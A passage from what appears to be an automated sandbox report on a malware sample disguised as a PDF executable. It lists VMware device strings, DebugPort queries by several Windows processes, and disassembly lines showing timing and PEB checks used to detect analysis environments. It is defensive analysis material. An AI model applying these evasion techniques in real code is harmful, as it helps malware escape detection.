Source: explorer.exe, 00000007.00000002.4602699260.000000000C377000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E59C mov eax, dword ptr fs:[00000030h]	6_2_0599E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h]	6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h]	6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05994588 mov eax, dword ptr fs:[00000030h]	6_2_05994588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962582 mov eax, dword ptr fs:[00000030h]	6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962582 mov ecx, dword ptr fs:[00000030h]	6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F5BE mov eax, dword ptr fs:[00000030h]	6_2_05A1F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h]	6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h]	6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h]	6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h]	6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059895DA mov eax, dword ptr fs:[00000030h]	6_2_059895DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059665D0 mov eax, dword ptr fs:[00000030h]	6_2_059665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD5D0 mov eax, dword ptr fs:[00000030h]	6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD5D0 mov ecx, dword ptr fs:[00000030h]	6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h]	6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h]	6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059955C0 mov eax, dword ptr fs:[00000030h]	6_2_059955C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A355C9 mov eax, dword ptr fs:[00000030h]	6_2_05A355C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h]	6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h]	6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059625E0 mov eax, dword ptr fs:[00000030h]	6_2_059625E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1B52F mov eax, dword ptr fs:[00000030h]	6_2_05A1B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35537 mov eax, dword ptr fs:[00000030h]	6_2_05A35537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05997505 mov eax, dword ptr fs:[00000030h]	6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05997505 mov ecx, dword ptr fs:[00000030h]	6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F6500 mov eax, dword ptr fs:[00000030h]	6_2_059F6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h]	6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h]	6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h]	6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h]	6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h]	6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h]	6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B562 mov eax, dword ptr fs:[00000030h]	6_2_0595B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h]	6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h]	6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B480 mov eax, dword ptr fs:[00000030h]	6_2_0595B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059934B0 mov eax, dword ptr fs:[00000030h]	6_2_059934B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059944B0 mov ecx, dword ptr fs:[00000030h]	6_2_059944B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EA4B0 mov eax, dword ptr fs:[00000030h]	6_2_059EA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059664AB mov eax, dword ptr fs:[00000030h]	6_2_059664AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A094E0 mov eax, dword ptr fs:[00000030h]	6_2_05A094E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059604E5 mov ecx, dword ptr fs:[00000030h]	6_2_059604E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A354DB mov eax, dword ptr fs:[00000030h]	6_2_05A354DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E7410 mov eax, dword ptr fs:[00000030h]	6_2_059E7410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598340D mov eax, dword ptr fs:[00000030h]	6_2_0598340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A430 mov eax, dword ptr fs:[00000030h]	6_2_0599A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C427 mov eax, dword ptr fs:[00000030h]	6_2_0595C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598245A mov eax, dword ptr fs:[00000030h]	6_2_0598245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595645D mov eax, dword ptr fs:[00000030h]	6_2_0595645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3547F mov eax, dword ptr fs:[00000030h]	6_2_05A3547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F453 mov eax, dword ptr fs:[00000030h]	6_2_05A1F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
